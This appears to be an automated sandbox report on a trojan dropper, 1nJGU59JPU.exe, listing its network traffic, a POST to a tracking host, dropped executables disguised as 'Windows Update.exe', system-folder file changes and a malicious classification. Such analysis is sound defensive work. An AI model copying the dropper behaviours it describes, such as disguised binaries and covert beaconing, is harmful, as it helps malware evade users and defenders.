Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2

Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.102.62
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.102.62
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115

Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php! equals www.facebook.com (Facebook)
Source: chrome.exe, 00000015.00000003.351247625.000002DEF1756000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350869130.000002DEF1746000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351350827.000002DEF1757000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.359235911.000001AC606C8000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.359010078.000001AC606D2000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357121246.000001AC606B3000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358935337.000001AC606C6000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358077477.000001AC606D1000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358283268.000001AC606C5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358135112.000001AC606C1000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359804478.0000018BEE6EF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.360104540.0000018BEE707000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359853031.0000018BEE702000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.364821402.0000018BEE70B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359113591.0000018BEE6ED000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359181332.0000018BEE71B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.360883339.0000018BEE70A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358355792.0000018BEE6F4000.00000004.00000001.sdmp, chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com' equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.351247625.000002DEF1756000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350869130.000002DEF1746000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351350827.000002DEF1757000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com@6w equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.357121246.000001AC606B3000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358283268.000001AC606C5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358135112.000001AC606C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comD equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comM equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comPXt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.351247625.000002DEF1756000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350869130.000002DEF1746000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comV6w equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.357121246.000001AC606B3000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358283268.000001AC606C5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358135112.000001AC606C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000003.359804478.0000018BEE6EF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359113591.0000018BEE6ED000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.coma equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comb equals www.youtube.com (Youtube)
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comp+ equals www.youtube.com (Youtube)

Source: unknown

HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.61:443 -> 192.168.2.3:50399 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50646 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.225:443 -> 192.168.2.3:50851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.164.165:443 -> 192.168.2.3:50853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.188:443 -> 192.168.2.3:50879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.71.70:443 -> 192.168.2.3:50883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.240:443 -> 192.168.2.3:50884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.243:443 -> 192.168.2.3:50889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.229:443 -> 192.168.2.3:50933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.252:443 -> 192.168.2.3:50935 version: TLS 1.2

DDoS:

Too many similar processes found

Source: chrome.exe

Process created: 76

System Summary:

Detected potential crypto function

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_0040840C	0_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0043533C	1_2_0043533C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004813C4	1_2_004813C4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004303D0	1_2_004303D0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0044453C	1_2_0044453C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004885E0	1_2_004885E0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00434638	1_2_00434638
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00444AE4	1_2_00444AE4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00470C74	1_2_00470C74
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0048ED0C	1_2_0048ED0C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00430F5C	1_2_00430F5C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045F16C	1_2_0045F16C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004451DC	1_2_004451DC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045B21C	1_2_0045B21C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004455E8	1_2_004455E8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00487680	1_2_00487680
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00467848	1_2_00467848
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0046989C	1_2_0046989C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00451A30	1_2_00451A30
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0043DDC4	1_2_0043DDC4
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Code function: 3_2_00007FFC086CD189	3_2_00007FFC086CD189

PE file contains strange resources

Source: 1nJGU59JPU.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Vahutuqeke.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Kixysyshysy.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: installer.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Section loaded: security.dll
Source: C:\Program Files (x86)\i-record\I-Record.exe	Section loaded: swscale-2.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Section loaded: security.dll

Uses 32bit PE files

Source: 1nJGU59JPU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Deletes files inside the Windows folder

Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe

File deleted: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.5188.20541046

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_0045568C

Creates files inside the system directory

Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe

File created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00408C1C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00406AD4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 0040596C appears 117 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00407904 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00445E48 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00457FC4 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00457DB8 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00434550 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00403494 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 004533B8 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00446118 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: String function: 00403684 appears 229 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0042F594 NtdllDefWindowProc_A,	1_2_0042F594
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00423B94 NtdllDefWindowProc_A,	1_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004125E8 NtdllDefWindowProc_A,	1_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00479380 NtdllDefWindowProc_A,	1_2_00479380
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	1_2_0045763C

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

1_2_0042E944

PE file contains executable resources (Code or Archives)

Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Sample file is different than original file name gathered from version info

Source: 1nJGU59JPU.exe, 00000000.00000003.271891331.0000000002570000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1nJGU59JPU.exe
Source: 1nJGU59JPU.exe, 00000000.00000003.272027551.0000000002460000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1nJGU59JPU.exe

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@226/292@152/78

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
